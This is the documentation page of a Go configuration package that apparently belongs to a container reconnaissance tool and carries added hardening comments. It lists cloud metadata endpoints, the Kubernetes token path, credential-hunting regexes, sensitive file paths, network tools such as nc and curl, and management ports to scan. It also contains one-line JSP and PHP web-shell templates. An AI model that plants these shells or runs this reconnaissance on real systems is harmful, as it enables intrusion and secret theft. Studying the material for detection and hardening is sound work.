conf

package
v0.1.9 Latest Latest
Warning

This package is not in the latest version of its module.

Published: Jan 29, 2021 License: GPL-2.0 Imports: 1 Imported by: 0

Documentation

Index

Constants

This section is empty.

Variables

// CloudAPI lists, per cloud provider, an instance-metadata URL (API), a
// substring expected in that endpoint's response (ResponseMatch) and the
// provider's documentation page (DocURL).
//
// NOTE(review): how the entries are consumed is not visible here; presumably
// each API is requested and the body searched for ResponseMatch to tell which
// cloud hosts the workload — confirm against the caller.
//
// Defensive relevance: every API below is plain HTTP to a metadata address
// that is normally reachable only from inside the instance. Anything running
// in a container that can reach it can read the same data, so restrict
// pod/container egress to these addresses where the workload does not need
// them.
var CloudAPI = []cloudAPIS{
	{
		CloudProvider: "Alibaba Cloud",
		API:           "http://100.100.100.200/latest/meta-data/",
		ResponseMatch: "instance-id",
		DocURL:        "https://help.aliyun.com/knowledge_detail/49122.html",
	},
	{
		CloudProvider: "Azure",
		API:           "http://169.254.169.254/metadata/instance",
		ResponseMatch: "azEnvironment",
		DocURL:        "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service",
	},
	{
		CloudProvider: "Google Cloud",
		API:           "http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true",
		ResponseMatch: "deviceName",
		DocURL:        "https://cloud.google.com/compute/docs/storing-retrieving-metadata",
	},
	{
		CloudProvider: "Tencent Cloud",
		API:           "http://metadata.tencentyun.com/latest/meta-data/",
		ResponseMatch: "instance-name",
		DocURL:        "https://cloud.tencent.com/document/product/213/4934",
	},
}
// K8sSATokenDefaultPath is the path at which Kubernetes mounts a pod's
// service-account token by default.
//
// Hardening note: a pod that never talks to the API server can set
// automountServiceAccountToken: false so that no token exists at this path;
// pods that do need one should be bound to a narrowly scoped role.
var K8sSATokenDefaultPath = "/var/run/secrets/kubernetes.io/serviceaccount/token"
// LinuxCommandChecklist names the Linux commands that are looked for in the
// container: network clients, container and cluster CLIs, language runtimes,
// package managers, web servers, VCS clients and disk/capability utilities.
//
// NOTE(review): the lookup mechanism (PATH search or otherwise) is not
// visible here.
//
// Hardening note: each tool on this list that an image actually ships is
// available to anyone who gains execution in the container; minimal or
// distroless base images keep this set small.
var LinuxCommandChecklist = []string{
	"curl",
	"wget",
	"nc",
	"netcat",
	"kubectl",
	"docker",
	"find",
	"ps",
	"java",
	"python",
	"python3",
	"php",
	"node",
	"npm",
	"apt",
	"yum",
	"dpkg",
	"nginx",
	"httpd",
	"apache",
	"apache2",
	"ssh",
	"mysql",
	"mysql-client",
	"git",
	"svn",
	"vi",
	"capsh",
	"mount",
	"fdisk",
}

Checks which useful Linux commands are present in the container.

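// ScanFileTextConf configures the text scan for credentials in files.
//
// MaxFileByte is 1 MiB and SkipExecutableFile is true; presumably files larger
// than the limit and executable files are not scanned — confirm against the
// scanner. RegexList maps a finding label to the pattern that reports it.
//
// The case-insensitive keyword prefixes are written as [fF][aA]... rather than
// [f|F][a|A]...: inside a character class '|' is a literal, so the earlier
// form also accepted a pipe character in place of any letter (and the Slack
// token class accepted "xox|-"). Removing the pipes only narrows the matches
// to the intended spellings.
//
// Defensive relevance: any hit from these patterns is credential material
// sitting in a readable file; treat a match as a secret to rotate and move
// into a secret store, not merely as a finding to suppress.
var ScanFileTextConf = textScanRules{
	MaxFileByte:        1024 * 1024,
	SkipExecutableFile: true,
	RegexList: map[string]string{
		"Slack Token":                  "(xox[pboa]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
		"RSA private key":              "-----BEGIN RSA PRIVATE KEY-----",
		"SSH (OPENSSH) private key":    "-----BEGIN OPENSSH PRIVATE KEY-----",
		"SSH (DSA) private key":        "-----BEGIN DSA PRIVATE KEY-----",
		"SSH (EC) private key":         "-----BEGIN EC PRIVATE KEY-----",
		"PGP private key block":        "-----BEGIN PGP PRIVATE KEY BLOCK-----",
		"Facebook Oauth":               "[fF][aA][cC][eE][bB][oO][oO][kK].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]",
		"Twitter Oauth":                "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]",
		"GitHub":                       "[gG][iI][tT][hH][uU][bB].{0,30}['\"\\s][0-9a-zA-Z]{35,40}['\"\\s]",
		"Google Oauth":                 "(\"client_secret\":\\s*?\"[a-zA-Z0-9-_]{24}\")",
		"AWS API Key":                  "AKIA[A-Z0-9]{16}",
		"Heroku API Key":               "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
		"Generic Secret":               "[sS][eE][cC][rR][eE][tT].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]",
		"Generic API Key":              "[aA][pP][iI][_]?[kK][eE][yY].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]",
		"Slack Webhook":                "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
		"Google (GCP) Service-account": "\"type\": \"service_account\"",
		"Twilio API Key":               "SK[a-z0-9]{32}",
		"Password in URL":              "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]",
	},
}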
// SensitiveEnvRegex is a case-insensitive pattern for environment entries of
// interest: "ssh_" at a word boundary, or "k8s", "kubernetes", "docker" or
// "gopath" anywhere. The \b binds only to the ssh_ alternative.
//
// NOTE(review): whether it is applied to variable names, values or whole
// NAME=value lines is not visible here.
var SensitiveEnvRegex = "(?i)\\bssh_|k8s|kubernetes|docker|gopath"

Matches environment variables to find useful services.

// SensitiveFileConf configures the sensitive-file search. StartDir is "/" and
// NameList holds the path fragments of interest: container-runtime sockets,
// kube/VCS/pip configuration directories, shell history and profile files,
// SSH directories, token files, service-account mounts, .dockerenv and
// config.json.
//
// NOTE(review): presumably the search walks down from StartDir and reports
// paths containing any NameList entry as a substring — confirm against the
// scanner. On that reading `/config.json` and `.token` are broad and will
// also report unrelated files.
//
// Defensive relevance: a docker.sock or containerd.sock visible inside a
// container gives that container control of the runtime on the host; such
// mounts, and kubeconfig or SSH material baked into images, are what a
// hardening review should remove.
var SensitiveFileConf = sensitiveFileRules{
	StartDir: "/",
	NameList: []string{
		`/docker.sock`,
		`/containerd.sock`,
		`/containerd/s/`,
		`.kube/`,
		`.git/`,
		`.svn/`,
		`.pip/`,
		`/.bash_history`,
		`/.bash_profile`,
		`/.bashrc`,
		`/.ssh/`,
		`.token`,
		`/serviceaccount`,
		`.dockerenv`,
		`/config.json`,
	},
}
// SensitiveProcessRegex is a case-insensitive pattern for process names of
// interest. Every alternative except the last matches as a substring (so
// "http" also hits "httpd" and "java" also hits "javac"); only "go" is
// anchored to word boundaries.
//
// NOTE(review): whether it is applied to the process name alone or to the
// full command line is not visible here.
var SensitiveProcessRegex = "(?i)ssh|ftp|http|tomcat|nginx|engine|php|java|python|perl|ruby|kube|docker|\\bgo\\b"

Matches process names to find useful services.

// TCPScannerConf holds the default TCP scan settings: a 500 ms Timeout, a
// MaxParallel of 50 and PortList, a table from service label to port. PortList
// values are strings, and the "nodeport-service" entry is a range
// ("30001-32767") rather than a single port.
//
// NOTE(review): Timeout is presumably per connection attempt and MaxParallel
// the number of concurrent attempts — confirm against the scanner.
//
// Defensive relevance: the table is a checklist of management ports that
// workloads should not be able to reach — 2375 is the conventional
// unencrypted Docker API port, 2379 the etcd client port, 10250 the kubelet
// API, 10255 the kubelet read-only port and 44134 Helm v2's Tiller. Network
// policy between pods and the node/control-plane addresses should close them.
var TCPScannerConf = TCPScannerConfS{
	Timeout:     500 * time.Millisecond,
	MaxParallel: 50,
	PortList: map[string]string{
		"ssh":                 "22",
		"http":                "80",
		"https":               "443",
		"docker-api":          "2375",
		"etcd":                "2379",
		"cAdvisor":            "4194",
		"k8s-api-server":      "6443",
		"http-1":              "8080",
		"https-1":             "8443",
		"kubelet-auth":        "10250",
		"kubelet-read":        "10255",
		"dashboard":           "30000",
		"nodeport-service":    "30001-32767",
		"tiller,weave,calico": "44134",
	},
}
// WebShellCodeJSP is a one-line JSP template that passes the request
// parameter named by the $SECRET_PARAM placeholder to
// Runtime.getRuntime().exec.
//
// NOTE(review): $SECRET_PARAM is presumably substituted before the template
// is used; the substitution is not visible here.
//
// Detection: a JSP in a web root that feeds request.getParameter(...)
// directly into Runtime.exec is a strong web-shell indicator. File-integrity
// monitoring on deployed web content and alerts on child processes spawned by
// the servlet container both cover it.
var WebShellCodeJSP = "<%Runtime.getRuntime().exec(request.getParameter(\"$SECRET_PARAM\"));%>"
// WebShellCodePHP is a one-line PHP template that evaluates the POST field
// named by the $SECRET_PARAM placeholder; the leading @ suppresses PHP error
// output for the eval call.
//
// NOTE(review): $SECRET_PARAM is presumably substituted before the template
// is used; the substitution is not visible here.
//
// Detection: eval applied directly to $_POST input is a standard web-shell
// signature. Content scanning of web roots for that construct, file-integrity
// monitoring, and disabling eval-style execution where the application does
// not need it all apply.
var WebShellCodePHP = "<?php @eval($_POST['$SECRET_PARAM']);?>"

Functions

This section is empty.

Types

type TCPScannerConfS

// TCPScannerConfS is the configuration type of the TCP port scanner.
type TCPScannerConfS struct {
	// Timeout is a duration limit; presumably applied to each connection
	// attempt — confirm against the scanner.
	Timeout time.Duration
	// MaxParallel is presumably the cap on concurrent connection attempts —
	// confirm against the scanner.
	MaxParallel int64
	// PortList maps a service label to a port given as a string; the package
	// default also uses a "low-high" range as a value.
	PortList map[string]string
}

Configuration for the TCP port scanner.
